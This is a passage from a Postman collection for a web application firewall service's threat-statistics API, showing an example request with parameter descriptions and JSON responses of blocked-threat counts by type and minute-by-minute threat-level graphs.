1587381600000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 128,\n                        \"time\": 1587385800000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 129,\n                        \"time\": 1587390000000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 130,\n                        \"time\": 1587394200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 131,\n                        \"time\": 1587398400000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 132,\n                        \"time\": 1587402600000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 133,\n                        \"time\": 1587406800000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 134,\n                        \"time\": 1587411000000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 135,\n                        \"time\": 1587415200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 136,\n                        \"time\": 1587419400000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 137,\n                        \"time\": 1587423600000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 138,\n                        \"time\": 1587427800000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 139,\n                        \"time\": 1587432000000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 140,\n                        \"time\": 1587436200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 141,\n                        \"time\": 1587440400000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 142,\n                        \"time\": 1587444600000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 143,\n                        \"time\": 1587448800000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 144,\n                        \"time\": 1587453000000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 145,\n                        \"time\": 1587457200000,\n                        \"line_number\": 0\n                    }\n                ]\n            }\n        ],\n        \"sum_info\": {\n            \"Monitor\": 0,\n            \"Block\": 5,\n            \"HTTP\": 5,\n            \"HTTPS\": 0,\n            \"total_number\": 5,\n            \"total_score\": 150,\n            \"threat_level\": \"Off\"\n        }\n    }\n}"},{"id":"62bc25ba-4bb6-4df3-809a-880221e755d4","name":"threatviewThreatsByTypes","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/threatview/security/statistics?report_by=main_type&filter={}&end=1587457479971&start=1587453879971&count=100&tend_by=threat_level&sort_by=threat_level","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","threatview","security","statistics"],"query":[{"key":"report_by","value":"main_type","description":"String. Log field name which will be used to group the result in grid. Value could be srccountry, \nmain_type, sub_type, etc."},{"key":"filter","value":"{}","description":"String. Could be deserialized as Json object. Make sure the value is url safe. For example, filter object is like  {\"http_url\":\"test\",\"main_type\":\"Known Attacks\"}. Then value for this param here should be like \"%7B%22http_url%22%3A%22test%22%2C%22main_type%22%3A%22Known%20Attacks%22%7D\""},{"key":"end","value":"1587457479971","description":"Long. The endtime of time range in millisecond format"},{"key":"start","value":"1587453879971","description":"Long. The beginning time of time range in millisecond format"},{"key":"count","value":"100","description":"Integer. Number of logs in one page. Value should be less than 100."},{"key":"tend_by","value":"threat_level","description":"String. Log field name which will be used to group data in chart view. Value could be http_method, action, etc."},{"key":"sort_by","value":"threat_level","description":"String. Field name which will be used to sort the result. Must present in response, like total_number, score, etc"}],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"String., the application ID."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 05 Jun 2019 10:05:00 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"16528"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"60b86322-8779-11e9-bf8f-050e8755fad5"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"azQHzESQIAMFWjQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf793cb-4537de9057b48e25cd2d7deb;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"details\": [\n        {\n            \"main_type\": \"Information Leakage\",\n            \"total_number\": 60,\n            \"total_score\": 1800,\n            \"HTTPS\": 60,\n            \"Block\": 60,\n            \"HTTP\": 0,\n            \"Monitor\": 0,\n            \"threat_level\": \"High\"\n        },\n        {\n            \"main_type\": \"Known Attacks\",\n            \"total_number\": 1,\n            \"total_score\": 30,\n            \"HTTPS\": 1,\n            \"Block\": 1,\n            \"HTTP\": 0,\n            \"Monitor\": 0,\n            \"threat_level\": \"High\"\n        }\n    ],\n    \"summary\": {\n        \"start\": \"1587453879971\",\n        \"end\": \"1587457479971\",\n        \"count\": 5,\n        \"graph\": [\n            {\n                \"line_name\": \"Critical\",\n                \"numbers\": [\n                    {\n                        \"id\": 1,\n                        \"time\": 1587453840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 2,\n                        \"time\": 1587453900000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 3,\n                        \"time\": 1587453960000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 4,\n                        \"time\": 1587454020000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 5,\n                        \"time\": 1587454080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 6,\n                        \"time\": 1587454140000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 7,\n                        \"time\": 1587454200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 8,\n                        \"time\": 1587454260000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 9,\n                        \"time\": 1587454320000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 10,\n                        \"time\": 1587454380000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 11,\n                        \"time\": 1587454440000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 12,\n                        \"time\": 1587454500000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 13,\n                        \"time\": 1587454560000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 14,\n                        \"time\": 1587454620000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 15,\n                        \"time\": 1587454680000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 16,\n                        \"time\": 1587454740000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 17,\n                        \"time\": 1587454800000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 18,\n                        \"time\": 1587454860000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 19,\n                        \"time\": 1587454920000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 20,\n                        \"time\": 1587454980000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 21,\n                        \"time\": 1587455040000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 22,\n                        \"time\": 1587455100000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 23,\n                        \"time\": 1587455160000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 24,\n                        \"time\": 1587455220000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 25,\n                        \"time\": 1587455280000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 26,\n                        \"time\": 1587455340000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 27,\n                        \"time\": 1587455400000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 28,\n                        \"time\": 1587455460000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 29,\n                        \"time\": 1587455520000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 30,\n                        \"time\": 1587455580000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 31,\n                        \"time\": 1587455640000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 32,\n                        \"time\": 1587455700000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 33,\n                        \"time\": 1587455760000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 34,\n                        \"time\": 1587455820000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 35,\n                        \"time\": 1587455880000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 36,\n                        \"time\": 1587455940000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 37,\n                        \"time\": 1587456000000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 38,\n                        \"time\": 1587456060000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 39,\n                        \"time\": 1587456120000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 40,\n                        \"time\": 1587456180000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 41,\n                        \"time\": 1587456240000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 42,\n                        \"time\": 1587456300000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 43,\n                        \"time\": 1587456360000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 44,\n                        \"time\": 1587456420000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 45,\n                        \"time\": 1587456480000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 46,\n                        \"time\": 1587456540000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 47,\n                        \"time\": 1587456600000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 48,\n                        \"time\": 1587456660000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 49,\n                        \"time\": 1587456720000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 50,\n                        \"time\": 1587456780000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 51,\n                        \"time\": 1587456840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 52,\n                        \"time\": 1587456900000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 53,\n                        \"time\": 1587456960000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 54,\n                        \"time\": 1587457020000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 55,\n                        \"time\": 1587457080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 56,\n                        \"time\": 1587457140000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 57,\n                        \"time\": 1587457200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 58,\n                        \"time\": 1587457260000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 59,\n                        \"time\": 1587457320000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 60,\n                        \"time\": 1587457380000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 61,\n                        \"time\": 1587457440000,\n                        \"line_number\": 0\n                    }\n                ]\n            },\n            {\n                \"line_name\": \"High\",\n                \"numbers\": [\n                    {\n                        \"id\": 1,\n                        \"time\": 1587453840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 2,\n                        \"time\": 1587453900000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 3,\n                        \"time\": 1587453960000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 4,\n                        \"time\": 1587454020000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 5,\n                        \"time\": 1587454080000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 6,\n                        \"time\": 1587454140000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 7,\n                        \"time\": 1587454200000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 8,\n                        \"time\": 1587454260000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 9,\n                        \"time\": 1587454320000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 10,\n                        \"time\": 1587454380000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 11,\n                        \"time\": 1587454440000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 12,\n                        \"time\": 1587454500000,\n                        \"line_number\": 2\n                    },\n                    {\n                        \"id\": 13,\n                        \"time\": 1587454560000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 14,\n                        \"time\": 1587454620000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 15,\n                        \"time\": 1587454680000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 16,\n                        \"time\": 1587454740000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 17,\n                        \"time\": 1587454800000,\n                        \"line_number\": 2\n                    },\n                    {\n                        \"id\": 18,\n                        \"time\": 1587454860000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 19,\n                        \"time\": 1587454920000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 20,\n                        \"time\": 1587454980000,\n                        \"line_number\": 2\n                    },\n                    {\n                        \"id\": 21,\n                        \"time\": 1587455040000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 22,\n                        \"time\": 1587455100000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 23,\n                        \"time\": 1587455160000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 24,\n                        \"time\": 1587455220000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 25,\n                        \"time\": 1587455280000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 26,\n                        \"time\": 1587455340000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 27,\n                        \"time\": 1587455400000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 28,\n                        \"time\": 1587455460000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 29,\n                        \"time\": 1587455520000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 30,\n                        \"time\": 1587455580000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 31,\n                        \"time\": 1587455640000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 32,\n                        \"time\": 1587455700000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 33,\n                        \"time\": 1587455760000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 34,\n                        \"time\": 1587455820000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 35,\n                        \"time\": 1587455880000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 36,\n                        \"time\": 1587455940000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 37,\n                        \"time\": 1587456000000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 38,\n                        \"time\": 1587456060000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 39,\n                        \"time\": 1587456120000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 40,\n                        \"time\": 1587456180000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 41,\n                        \"time\": 1587456240000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 42,\n                        \"time\": 1587456300000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 43,\n                        \"time\": 1587456360000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 44,\n                        \"time\": 1587456420000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 45,\n                        \"time\": 1587456480000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 46,\n                        \"time\": 1587456540000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 47,\n                        \"time\": 1587456600000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 48,\n                        \"time\": 1587456660000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 49,\n                        \"time\": 1587456720000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 50,\n                        \"time\": 1587456780000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 51,\n                        \"time\": 1587456840000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 52,\n                        \"time\": 1587456900000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 53,\n                        \"time\": 1587456960000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 54,\n                        \"time\": 1587457020000,\n                        \"line_number\": 2\n                    },\n                    {\n                        \"id\": 55,\n                        \"time\": 1587457080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 56,\n                        \"time\": 1587457140000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 57,\n                        \"time\": 1587457200000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 58,\n                        \"time\": 1587457260000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 59,\n                        \"time\": 1587457320000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 60,\n                        \"time\": 1587457380000,\n                        \"line_number\": 1\n                    },\n                    {\n                        \"id\": 61,\n                        \"time\": 1587457440000,\n                        \"line_number\": 1\n                    }\n                ]\n            },\n            {\n                \"line_name\": \"Medium\",\n                \"numbers\": [\n                    {\n                        \"id\": 1,\n                        \"time\": 1587453840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 2,\n                        \"time\": 1587453900000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 3,\n                        \"time\": 1587453960000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 4,\n                        \"time\": 1587454020000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 5,\n                        \"time\": 1587454080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 6,\n                        \"time\": 1587454140000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 7,\n                        \"time\": 1587454200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 8,\n                        \"time\": 1587454260000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 9,\n                        \"time\": 1587454320000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 10,\n                        \"time\": 1587454380000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 11,\n                        \"time\": 1587454440000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 12,\n                        \"time\": 1587454500000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 13,\n                        \"time\": 1587454560000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 14,\n                        \"time\": 1587454620000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 15,\n                        \"time\": 1587454680000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 16,\n                        \"time\": 1587454740000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 17,\n                        \"time\": 1587454800000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 18,\n                        \"time\": 1587454860000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 19,\n                        \"time\": 1587454920000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 20,\n                        \"time\": 1587454980000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 21,\n                        \"time\": 1587455040000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 22,\n                        \"time\": 1587455100000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 23,\n                        \"time\": 1587455160000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 24,\n                        \"time\": 1587455220000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 25,\n                        \"time\": 1587455280000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 26,\n                        \"time\": 1587455340000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 27,\n                        \"time\": 1587455400000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 28,\n                        \"time\": 1587455460000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 29,\n                        \"time\": 1587455520000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 30,\n                        \"time\": 1587455580000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 31,\n                        \"time\": 1587455640000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 32,\n                        \"time\": 1587455700000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 33,\n                        \"time\": 1587455760000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 34,\n                        \"time\": 1587455820000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 35,\n                        \"time\": 1587455880000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 36,\n                        \"time\": 1587455940000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 37,\n                        \"time\": 1587456000000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 38,\n                        \"time\": 1587456060000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 39,\n                        \"time\": 1587456120000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 40,\n                        \"time\": 1587456180000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 41,\n                        \"time\": 1587456240000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 42,\n                        \"time\": 1587456300000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 43,\n                        \"time\": 1587456360000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 44,\n                        \"time\": 1587456420000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 45,\n                        \"time\": 1587456480000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 46,\n                        \"time\": 1587456540000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 47,\n                        \"time\": 1587456600000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 48,\n                        \"time\": 1587456660000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 49,\n                        \"time\": 1587456720000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 50,\n                        \"time\": 1587456780000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 51,\n                        \"time\": 1587456840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 52,\n                        \"time\": 1587456900000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 53,\n                        \"time\": 1587456960000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 54,\n                        \"time\": 1587457020000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 55,\n                        \"time\": 1587457080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 56,\n                        \"time\": 1587457140000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 57,\n                        \"time\": 1587457200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 58,\n                        \"time\": 1587457260000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 59,\n                        \"time\": 1587457320000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 60,\n                        \"time\": 1587457380000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 61,\n                        \"time\": 1587457440000,\n                        \"line_number\": 0\n                    }\n                ]\n            },\n            {\n                \"line_name\": \"Low\",\n                \"numbers\": [\n                    {\n                        \"id\": 1,\n                        \"time\": 1587453840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 2,\n                        \"time\": 1587453900000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 3,\n                        \"time\": 1587453960000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 4,\n                        \"time\": 1587454020000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 5,\n                        \"time\": 1587454080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 6,\n                        \"time\": 1587454140000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 7,\n                        \"time\": 1587454200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 8,\n                        \"time\": 1587454260000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 9,\n                        \"time\": 1587454320000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 10,\n                        \"time\": 1587454380000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 11,\n                        \"time\": 1587454440000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 12,\n                        \"time\": 1587454500000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 13,\n                        \"time\": 1587454560000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 14,\n                        \"time\": 1587454620000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 15,\n                        \"time\": 1587454680000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 16,\n                        \"time\": 1587454740000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 17,\n                        \"time\": 1587454800000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 18,\n                        \"time\": 1587454860000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 19,\n                        \"time\": 1587454920000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 20,\n                        \"time\": 1587454980000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 21,\n                        \"time\": 1587455040000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 22,\n                        \"time\": 1587455100000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 23,\n                        \"time\": 1587455160000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 24,\n                        \"time\": 1587455220000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 25,\n                        \"time\": 1587455280000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 26,\n                        \"time\": 1587455340000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 27,\n                        \"time\": 1587455400000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 28,\n                        \"time\": 1587455460000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 29,\n                        \"time\": 1587455520000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 30,\n                        \"time\": 1587455580000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 31,\n                        \"time\": 1587455640000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 32,\n                        \"time\": 1587455700000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 33,\n                        \"time\": 1587455760000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 34,\n                        \"time\": 1587455820000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 35,\n                        \"time\": 1587455880000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 36,\n                        \"time\": 1587455940000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 37,\n                        \"time\": 1587456000000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 38,\n                        \"time\": 1587456060000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 39,\n                        \"time\": 1587456120000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 40,\n                        \"time\": 1587456180000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 41,\n                        \"time\": 1587456240000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 42,\n                        \"time\": 1587456300000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 43,\n                        \"time\": 1587456360000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 44,\n                        \"time\": 1587456420000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 45,\n                        \"time\": 1587456480000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 46,\n                        \"time\": 1587456540000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 47,\n                        \"time\": 1587456600000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 48,\n                        \"time\": 1587456660000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 49,\n                        \"time\": 1587456720000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 50,\n                        \"time\": 1587456780000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 51,\n                        \"time\": 1587456840000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 52,\n                        \"time\": 1587456900000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 53,\n                        \"time\": 1587456960000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 54,\n                        \"time\": 1587457020000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 55,\n                        \"time\": 1587457080000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 56,\n                        \"time\": 1587457140000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 57,\n                        \"time\": 1587457200000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 58,\n                        \"time\": 1587457260000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 59,\n                        \"time\": 1587457320000,\n                        \"line_number\": 0\n                    },\n                    {\n                        \"id\": 60,\n                        \"time\": 1587457380000,\n                        \"line_number\": 0\n        